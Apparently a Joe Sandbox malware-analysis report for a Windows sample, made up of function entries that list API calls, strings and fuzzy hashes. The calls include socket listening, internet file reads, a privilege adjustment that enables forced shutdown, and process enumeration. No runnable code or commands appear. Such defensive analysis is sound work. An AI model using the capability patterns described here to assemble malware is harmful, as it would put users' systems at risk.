Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 0185bebe045492b58d2dd87f74bc1b1b8f81b656da70b4edf2cd560b33173346
Instruction ID: 72b18a5cfe36b742d8c628923a1b4fa24a32d24104f084aa7b81291bd904d0f4
Opcode Fuzzy Hash: 0185bebe045492b58d2dd87f74bc1b1b8f81b656da70b4edf2cd560b33173346
Instruction Fuzzy Hash: 3C418F7190021AEBCF55DFA4CC89EEEBBB4FF46310F54466AE815A3190DB389E44CB90

Function 007558C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00755A05
_memmove.LIBCMT ref: 00755A55
_memmove.LIBCMT ref: 00755ABB

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 4db9b256aa036f78c869381e15fdd54809363bc550799a74defe42345c99f9da
Instruction ID: 88d1c893a28e6f474c448d61516331dccd26dfa66cc6512e446af960c4b7a544
Opcode Fuzzy Hash: 4db9b256aa036f78c869381e15fdd54809363bc550799a74defe42345c99f9da
Instruction Fuzzy Hash: 121279B0A00609DFDF14DFA4D999AEEB7B5FF48300F108569E806E7251EB39AD15CB90

Function 00755680 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00760FF6: std::exception::exception.LIBCMT ref: 0076102C
Part of subcall function 00760FF6: __CxxThrowException@8.LIBCMT ref: 00761041

_memmove.LIBCMT ref: 0079062F
_memmove.LIBCMT ref: 00790744
_memmove.LIBCMT ref: 007907EB

Strings

yZu, xrefs: 00790881, 007907FF

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID: yZu
API String ID: 1300846289-3294280352
Opcode ID: 55bd049451a728c8d6ba57c9ef001e8c1529e034c9c4a40952df9c27bae7f0dd
Instruction ID: 5fdbec23ce7a997667bdc3321a75f53a57752740ef828a06e25ded1992da6de6
Opcode Fuzzy Hash: 55bd049451a728c8d6ba57c9ef001e8c1529e034c9c4a40952df9c27bae7f0dd
Instruction Fuzzy Hash: 8C02A0B0A00209DFCF04DF64E995AAEBBB5FF44310F148069E806DB255EB39EA55CB91

Function 007A545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00798CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00798D0D
Part of subcall function 00798CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00798D3A
Part of subcall function 00798CC3: GetLastError.KERNEL32 ref: 00798D47

ExitWindowsEx.USER32(?,00000000), ref: 007A549B

Strings

, xrefs: 007A5489
@, xrefs: 007A548E
SeShutdownPrivilege, xrefs: 007A546B

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 8c4df0c346a7cc737aca7b3b65d5c81ab257af56197c5279bca91a0f5f7fba48
Instruction ID: 7a7d261430ec0b439bb53d3660d13f01c10fad02283f5237d7836b7b66bdc5b4
Opcode Fuzzy Hash: 8c4df0c346a7cc737aca7b3b65d5c81ab257af56197c5279bca91a0f5f7fba48
Instruction Fuzzy Hash: 7A014771655A416AEB685674EC4AFBA7358EB8B353F200324FD06D20C2DA5C0C8081A0

Function 00753190 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON

Download Yara Rule

Strings

Oau, xrefs: 00753482

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: __itow__swprintf
String ID: Oau
API String ID: 674341424-3624848570
Opcode ID: a78672d74e43e3e7cb9fe946d9740f954538c87b25ff7463479d05940daef1e1
Instruction ID: 9ec0dcfaf0d36b07c6da4fbd8e56d1f01344ed74da70a0137a9cf4d95205ed88
Opcode Fuzzy Hash: a78672d74e43e3e7cb9fe946d9740f954538c87b25ff7463479d05940daef1e1
Instruction Fuzzy Hash: 19229D71608341DFC724DF24C895BABB7E4BF84350F10491DF996972A1EB78EA08CB92

Function 007B6596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006), ref: 007B65EF
WSAGetLastError.WSOCK32(00000000), ref: 007B65FE
bind.WSOCK32(00000000,?,00000010), ref: 007B661A
listen.WSOCK32(00000000,00000005), ref: 007B6629
WSAGetLastError.WSOCK32(00000000), ref: 007B6643
closesocket.WSOCK32(00000000), ref: 007B6657

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: ba1967801d82b8acbd52389f3333c5d6114a50f74fff4cf13736dc6ad54b7f78
Instruction ID: 4b305ec236ba196aadf7623aadcf3807e9d8e1c85f920d9c550f8ed3e6d4b23d
Opcode Fuzzy Hash: ba1967801d82b8acbd52389f3333c5d6114a50f74fff4cf13736dc6ad54b7f78
Instruction Fuzzy Hash: 47217C31600204DFCB10AF64D889FAEB7EAEF49724F148169EA56E73D1CB78AD01CB55

Function 00741287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623

DefDlgProcW.USER32(?,?,?,?,?), ref: 007419FA
GetSysColor.USER32(0000000F), ref: 00741A4E
SetBkColor.GDI32(?,00000000), ref: 00741A61

Part of subcall function 00741290: DefDlgProcW.USER32(?,00000020,?), ref: 007412D8

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: a5ed0ef7f5ec98af736198e9d8196bb1de4cfca0be38198b5d615b61775f591a
Instruction ID: 0b0fd535224a1e66a31db8895c95b03ccf46ef4ada78e9d9aedb83e9d38278fe
Opcode Fuzzy Hash: a5ed0ef7f5ec98af736198e9d8196bb1de4cfca0be38198b5d615b61775f591a
Instruction Fuzzy Hash: 09A158B0201584FADA29BF384C48F7B2B9DEB46385B94C11DF406D6192DB2C9C919276

Function 007B6A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 007B80A0: inet_addr.WSOCK32(00000000), ref: 007B80CB

socket.WSOCK32(00000002,00000002,00000011), ref: 007B6AB1
WSAGetLastError.WSOCK32(00000000), ref: 007B6ADA
bind.WSOCK32(00000000,?,00000010), ref: 007B6B13
WSAGetLastError.WSOCK32(00000000), ref: 007B6B20
closesocket.WSOCK32(00000000), ref: 007B6B34

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: a6c754acc2ac316861548928b889f8c2fa471eac9558357fe69142fdf15e6a5b
Instruction ID: 0c4c867d79b0eefbde4d6a94ee09de14a3594569990adc1017904d9b3dfb1dc1
Opcode Fuzzy Hash: a6c754acc2ac316861548928b889f8c2fa471eac9558357fe69142fdf15e6a5b
Instruction Fuzzy Hash: EB417E75700214EFEB10BF649C8AF6E77A99B45720F448058FA5AAB3D2DB789D008691

Function 007C55FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 007C564C
IsWindowEnabled.USER32 ref: 007C565A
GetForegroundWindow.USER32(?,?,00000001), ref: 007C5667
IsIconic.USER32 ref: 007C5675
IsZoomed.USER32 ref: 007C5683

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 140a92efc43be40db478ff6a29c16f83e7a9988de1c35b4242d8371163d2afd5
Instruction ID: c4bbe2a80e96dcb1e10a8bc81a8b98e86bb9c3194e7e2776cba25c3b77927672
Opcode Fuzzy Hash: 140a92efc43be40db478ff6a29c16f83e7a9988de1c35b4242d8371163d2afd5
Instruction Fuzzy Hash: CB11B231300910AFE7215F26DC48F6BBB99EF44B21B84842DE946E7241CB79E941CAA9

Function 007AC602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 007AC69D
CoCreateInstance.OLE32(007D2D6C,00000000,00000001,007D2BDC,?), ref: 007AC6B5

Part of subcall function 00747F41: _memmove.LIBCMT ref: 00747F82

CoUninitialize.OLE32 ref: 007AC922

Strings

.lnk, xrefs: 007AC631, 007AC659, 007AC663

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 2c68bb657e5e4107f7877fca9d238abb07345d9ef46132750cd2b3cc20162c9c
Instruction ID: 50cb91705493097955be46c96ee3c48da8f948fad694a51357af1eafe80a696f
Opcode Fuzzy Hash: 2c68bb657e5e4107f7877fca9d238abb07345d9ef46132750cd2b3cc20162c9c
Instruction Fuzzy Hash: A2A13E71208205EFD700EF54C885EABB7ECEF95704F008A1DF196972A2DB74EA49CB52

Function 007BC304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00781D88,?), ref: 007BC312
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007BC324

Strings

GetSystemWow64DirectoryW, xrefs: 007BC31E
kernel32.dll, xrefs: 007BC30D

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 1e5736c0d3b2a4bb48118da35fa1befb5cf805b74021a6e7ae4659a868d20d51
Instruction ID: deaebaca336543427d2e08b5bf3be2947bc5f23e8473ca85016439de9ea353f1
Opcode Fuzzy Hash: 1e5736c0d3b2a4bb48118da35fa1befb5cf805b74021a6e7ae4659a868d20d51
Instruction Fuzzy Hash: 7BE0B6B4600716CFDB214B25D804B9676D5AB48755B84C43DE896D6250E778D8408A61

Function 007BF121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 007BF151
Process32FirstW.KERNEL32(00000000,?), ref: 007BF15F

Part of subcall function 00747F41: _memmove.LIBCMT ref: 00747F82

Process32NextW.KERNEL32(00000000,?), ref: 007BF21F
CloseHandle.KERNEL32(00000000,?,?,?), ref: 007BF22E

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 6df03e8e0c7a7aab9178f7693af757160818edf7b30e081a6ef33b283f7ceff3
Instruction ID: 1c709f57f29b0d000549c9530a826c526c2c8c2e351db68725f108c7f0fa6734
Opcode Fuzzy Hash: 6df03e8e0c7a7aab9178f7693af757160818edf7b30e081a6ef33b283f7ceff3
Instruction Fuzzy Hash: 4E516B71504314EFD310EF24DC89EABBBE8BF98710F14492DF59597291EB74A908CB92

Function 0079EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 0079EB19

Strings

(, xrefs: 0079EB5F
|, xrefs: 0079EB49

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: dfcb69ff8d9297dcc62a4df91030c29117de466e08d0207d3d2e57b29e423a6d
Instruction ID: bd409ae80303ec2e621a2589b90dad340909eb2474cbb81bca4991741fc9246f
Opcode Fuzzy Hash: dfcb69ff8d9297dcc62a4df91030c29117de466e08d0207d3d2e57b29e423a6d
Instruction Fuzzy Hash: D23236B5A00605DFDB28CF19D481A6AB7F1FF48320B15C56EE89ADB3A1E774E941CB40

Function 007B25E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 007B26D5
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 007B270C

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 35f69d0c440430c8883744a3677e5abe8f9c687e13c03272696b582bf4b29f9d
Instruction ID: 62fd4c0d3a47cb6361264c16430bdab05d1b0d538a06e107925f261b81198b10
Opcode Fuzzy Hash: 35f69d0c440430c8883744a3677e5abe8f9c687e13c03272696b582bf4b29f9d
Instruction Fuzzy Hash: D641D671501209FFEB20DE54DC89FFBB7BCEB40718F10406EFA05A6542EE799E429658

Function 007AB59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007AB5AE
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 007AB608
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 007AB655

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 84bc575c5ba98a27f64e4daefad1881b0d040fb7c156f6b527526fa95be58c8b
Instruction ID: 68323b8fb0014ecba352cdd3fde301e05242555e06e69c8818d2098fe94504ff
Opcode Fuzzy Hash: 84bc575c5ba98a27f64e4daefad1881b0d040fb7c156f6b527526fa95be58c8b
Instruction Fuzzy Hash: 81217F35A00118EFCB00EFA5D884EEEBBB8FF89310F1481A9E905AB351DB35A915CB55

Function 00798CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00760FF6: std::exception::exception.LIBCMT ref: 0076102C
Part of subcall function 00760FF6: __CxxThrowException@8.LIBCMT ref: 00761041

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00798D0D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00798D3A
GetLastError.KERNEL32 ref: 00798D47

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 9a88b21a9150a34b6c859d4d9d6677d5456e79b89b7b49c3f7bcfbf5899fb855
Instruction ID: 093ccb15dae17cab51befa49b13e2a92cdc828607a39eed71c16da7dd69748f2
Opcode Fuzzy Hash: 9a88b21a9150a34b6c859d4d9d6677d5456e79b89b7b49c3f7bcfbf5899fb855
Instruction Fuzzy Hash: 6C1191B2514209AFDB28EF54EC89D6BB7BDFB45710B24852EF85693241EB34AC408A64

Function 007A4021 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007A404B
DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 007A4088
CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007A4091

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
